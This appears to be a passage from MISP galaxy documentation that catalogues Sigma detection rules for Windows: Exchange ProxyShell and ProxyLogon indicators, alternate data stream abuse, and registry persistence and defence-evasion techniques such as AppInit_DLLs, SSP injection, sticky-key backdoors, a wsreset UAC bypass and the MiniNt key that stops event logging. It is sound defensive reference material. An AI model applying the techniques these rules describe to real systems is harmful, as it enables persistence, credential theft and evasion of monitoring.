https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml

Exchange Set OabVirtualDirectory ExternalUrl Property

Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log

The tag is: misp-galaxy:sigma-rules="Exchange Set OabVirtualDirectory ExternalUrl Property"

Exchange Set OabVirtualDirectory ExternalUrl Property has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9263. Table References

Links

https://twitter.com/OTR_Community/status/1371053369071132675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml

Failed MSExchange Transport Agent Installation

Detects a failed installation of a Exchange Transport Agent

The tag is: misp-galaxy:sigma-rules="Failed MSExchange Transport Agent Installation"

Failed MSExchange Transport Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 9264. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml

ProxyLogon MSExchange OabVirtualDirectory

Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory

The tag is: misp-galaxy:sigma-rules="ProxyLogon MSExchange OabVirtualDirectory"

ProxyLogon MSExchange OabVirtualDirectory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9265. Table References

Links

https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml

Certificate Request Export to Exchange Webserver

Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell

The tag is: misp-galaxy:sigma-rules="Certificate Request Export to Exchange Webserver"

Certificate Request Export to Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9266. Table References

Links

https://twitter.com/GossiTheDog/status/1429175908905127938

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml

Mailbox Export to Exchange Webserver

Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it

The tag is: misp-galaxy:sigma-rules="Mailbox Export to Exchange Webserver"

Mailbox Export to Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9267. Table References

Links

https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml

MSExchange Transport Agent Installation - Builtin

Detects the Installation of a Exchange Transport Agent

The tag is: misp-galaxy:sigma-rules="MSExchange Transport Agent Installation - Builtin"

MSExchange Transport Agent Installation - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 9268. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml

Exports Registry Key To an Alternate Data Stream

Exports the target Registry key and hides it in the specified alternate data stream.

The tag is: misp-galaxy:sigma-rules="Exports Registry Key To an Alternate Data Stream"

Exports Registry Key To an Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9269. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml

Potentially Suspicious File Download From ZIP TLD

Detects the download of a file with a potentially suspicious extension from a .zip top level domain.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious File Download From ZIP TLD"

Table 9270. Table References

Links

https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/

https://twitter.com/cyb3rops/status/1659175181695287297

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml

Unusual File Download From File Sharing Websites

Detects the download of suspicious file type from a well-known file and paste sharing domain

The tag is: misp-galaxy:sigma-rules="Unusual File Download From File Sharing Websites"

Unusual File Download From File Sharing Websites has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9271. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml

HackTool Named File Stream Created

Detects the creation of a named file stream with the imphash of a well-known hack tool

The tag is: misp-galaxy:sigma-rules="HackTool Named File Stream Created"

HackTool Named File Stream Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9272. Table References

Links

https://github.com/xuanxuan0/DripLoader

https://github.com/antonioCoco/RoguePotato

https://github.com/outflanknl/Dumpert

https://www.tarasco.org/security/pwdump_7/

https://github.com/ohpe/juicy-potato

https://github.com/codewhitesec/HandleKatz

https://github.com/topotam/PetitPotam

https://github.com/gentilkiwi/mimikatz

https://github.com/hfiref0x/UACME

https://github.com/wavestone-cdt/EDRSandblast

https://github.com/fortra/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml

Creation Of a Suspicious ADS File Outside a Browser Download

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

The tag is: misp-galaxy:sigma-rules="Creation Of a Suspicious ADS File Outside a Browser Download"

Table 9273. Table References

Links

https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml

Suspicious File Download From File Sharing Websites

Detects the download of suspicious file type from a well-known file and paste sharing domain

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From File Sharing Websites"

Suspicious File Download From File Sharing Websites has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9274. Table References

Links

https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml

Unusual File Download from Direct IP Address

Detects the download of suspicious file type from URLs with IP

The tag is: misp-galaxy:sigma-rules="Unusual File Download from Direct IP Address"

Unusual File Download from Direct IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9275. Table References

Links

https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md

https://labs.withsecure.com/publications/detecting-onenote-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml

Potential Suspicious Winget Package Installation

Detects potential suspicious winget package installation from a suspicious source.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Winget Package Installation"

Table 9276. Table References

Links

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml

Hidden Executable In NTFS Alternate Data Stream

Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

The tag is: misp-galaxy:sigma-rules="Hidden Executable In NTFS Alternate Data Stream"

Hidden Executable In NTFS Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9277. Table References

Links

https://twitter.com/0xrawsec/status/1002478725605273600?s=21

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml

Office Application Startup - Office Test

Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started

The tag is: misp-galaxy:sigma-rules="Office Application Startup - Office Test"

Office Application Startup - Office Test has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"

Table 9278. Table References

Links

https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml

RedMimicry Winnti Playbook Registry Manipulation

Detects actions caused by the RedMimicry Winnti playbook

The tag is: misp-galaxy:sigma-rules="RedMimicry Winnti Playbook Registry Manipulation"

RedMimicry Winnti Playbook Registry Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9279. Table References

Links

https://redmimicry.com

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml

Suspicious Camera and Microphone Access

Detects Processes accessing the camera and microphone from suspicious folder

The tag is: misp-galaxy:sigma-rules="Suspicious Camera and Microphone Access"

Suspicious Camera and Microphone Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 9280. Table References

Links

https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

The tag is: misp-galaxy:sigma-rules="Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback"

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9281. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml

PortProxy Registry Key

Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.

The tag is: misp-galaxy:sigma-rules="PortProxy Registry Key"

PortProxy Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9282. Table References

Links

https://adepts.of0x.cc/netsh-portproxy-code/

https://www.dfirnotes.net/portproxy_detection/

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml

Registry Persistence Mechanisms in Recycle Bin

Detects persistence registry keys for Recycle Bin

The tag is: misp-galaxy:sigma-rules="Registry Persistence Mechanisms in Recycle Bin"

Registry Persistence Mechanisms in Recycle Bin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9283. Table References

Links

https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf

https://persistence-info.github.io/Data/recyclebin.html

https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml

DLL Load via LSASS

Detects a method to load DLL via LSASS process using an undocumented Registry key

The tag is: misp-galaxy:sigma-rules="DLL Load via LSASS"

DLL Load via LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 9284. Table References

Links

https://blog.xpnsec.com/exploring-mimikatz-part-1/

https://twitter.com/SBousseaden/status/1183745981189427200

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml

Path To Screensaver Binary Modified

Detects value modification of registry key containing path to binary used as screensaver.

The tag is: misp-galaxy:sigma-rules="Path To Screensaver Binary Modified"

Path To Screensaver Binary Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 9285. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml

PrinterNightmare Mimikatz Driver Name

Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527

The tag is: misp-galaxy:sigma-rules="PrinterNightmare Mimikatz Driver Name"

PrinterNightmare Mimikatz Driver Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 9286. Table References

Links

https://www.lexjansen.com/sesug/1993/SESUG93035.pdf

https://nvd.nist.gov/vuln/detail/cve-2021-34527

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913

https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760

https://nvd.nist.gov/vuln/detail/cve-2021-1675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml

Suspicious Run Key from Download

Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories

The tag is: misp-galaxy:sigma-rules="Suspicious Run Key from Download"

Suspicious Run Key from Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9287. Table References

Links

https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml

Windows Registry Trust Record Modification

Alerts on trust record modification within the registry, indicating usage of macros

The tag is: misp-galaxy:sigma-rules="Windows Registry Trust Record Modification"

Windows Registry Trust Record Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9288. Table References

Links

https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/

http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml

Run Once Task Configuration in Registry

Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup

The tag is: misp-galaxy:sigma-rules="Run Once Task Configuration in Registry"

Run Once Task Configuration in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9289. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

https://twitter.com/pabraeken/status/990717080805789697

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml

New DLL Added to AppCertDlls Registry Key

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

The tag is: misp-galaxy:sigma-rules="New DLL Added to AppCertDlls Registry Key"

New DLL Added to AppCertDlls Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 9290. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html

http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml

Potential Qakbot Registry Activity

Detects a registry key used by IceID in a campaign that distributes malicious OneNote files

The tag is: misp-galaxy:sigma-rules="Potential Qakbot Registry Activity"

Potential Qakbot Registry Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9291. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml

Disable Security Events Logging Adding Reg Key MiniNt

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.

The tag is: misp-galaxy:sigma-rules="Disable Security Events Logging Adding Reg Key MiniNt"

Disable Security Events Logging Adding Reg Key MiniNt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9292. Table References

Links

https://twitter.com/0gtweet/status/1182516740955226112

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml

Creation of a Local Hidden User Account by Registry

Sysmon registry detection of a local hidden user account.

The tag is: misp-galaxy:sigma-rules="Creation of a Local Hidden User Account by Registry"

Creation of a Local Hidden User Account by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9293. Table References

Links

https://twitter.com/SBousseaden/status/1387530414185664538

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml

Windows Credential Editor Registry

Detects the use of Windows Credential Editor (WCE)

The tag is: misp-galaxy:sigma-rules="Windows Credential Editor Registry"

Windows Credential Editor Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9294. Table References

Links

https://www.ampliasecurity.com/research/windows-credentials-editor/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml

Security Support Provider (SSP) Added to LSA Configuration

Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

The tag is: misp-galaxy:sigma-rules="Security Support Provider (SSP) Added to LSA Configuration"

Security Support Provider (SSP) Added to LSA Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"

Table 9295. Table References

Links

https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml

Leviathan Registry Key Activity

Detects registry key used by Leviathan APT in Malaysian focused campaign

The tag is: misp-galaxy:sigma-rules="Leviathan Registry Key Activity"

Leviathan Registry Key Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9296. Table References

Links

https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml

OceanLotus Registry Activity

Detects registry keys created in OceanLotus (also known as APT32) attacks

The tag is: misp-galaxy:sigma-rules="OceanLotus Registry Activity"

OceanLotus Registry Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9297. Table References

Links

https://github.com/eset/malware-ioc/tree/master/oceanlotus

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml

UAC Bypass Via Wsreset

Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.

The tag is: misp-galaxy:sigma-rules="UAC Bypass Via Wsreset"

UAC Bypass Via Wsreset has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9298. Table References

Links

https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly

https://lolbas-project.github.io/lolbas/Binaries/Wsreset

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml

NetNTLM Downgrade Attack - Registry

Detects NetNTLM downgrade attack

The tag is: misp-galaxy:sigma-rules="NetNTLM Downgrade Attack - Registry"

NetNTLM Downgrade Attack - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9299. Table References

Links

https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml

Sticky Key Like Backdoor Usage - Registry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

The tag is: misp-galaxy:sigma-rules="Sticky Key Like Backdoor Usage - Registry"

Sticky Key Like Backdoor Usage - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 9300. Table References

Links

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml

New DLL Added to AppInit_DLLs Registry Key

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

The tag is: misp-galaxy:sigma-rules="New DLL Added to AppInit_DLLs Registry Key"

New DLL Added to AppInit_DLLs Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

Table 9301. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml

Narrator’s Feedback-Hub Persistence

Detects abusing Windows 10 Narrator’s Feedback-Hub

The tag is: misp-galaxy:sigma-rules="Narrator’s Feedback-Hub Persistence"

Narrator’s Feedback-Hub Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9302. Table References

Links

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml

OilRig APT Registry Persistence

Detects OilRig registry persistence as reported by Nyotron in their March 2018 report

The tag is: misp-galaxy:sigma-rules="OilRig APT Registry Persistence"

OilRig APT Registry Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 9303. Table References

Links

https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oilrig_mar18.yml

Registry Entries For Azorult Malware

Detects the presence of a registry key created during Azorult execution

The tag is: misp-galaxy:sigma-rules="Registry Entries For Azorult Malware"

Registry Entries For Azorult Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9304. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml

CMSTP Execution Registry Event

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Registry Event"

CMSTP Execution Registry Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9305. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml

Atbroker Registry Change

Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

The tag is: misp-galaxy:sigma-rules="Atbroker Registry Change"

Atbroker Registry Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9306. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml

Wdigest CredGuard Registry Modification

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.

The tag is: misp-galaxy:sigma-rules="Wdigest CredGuard Registry Modification"

Wdigest CredGuard Registry Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9307. Table References

Links

https://teamhydra.blog/2020/08/25/bypassing-credential-guard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml

WINEKEY Registry Modification

Detects potential malicious modification of run keys by winekey or team9 backdoor

The tag is: misp-galaxy:sigma-rules="WINEKEY Registry Modification"

WINEKEY Registry Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9308. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml

HybridConnectionManager Service Installation - Registry

Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Installation - Registry"

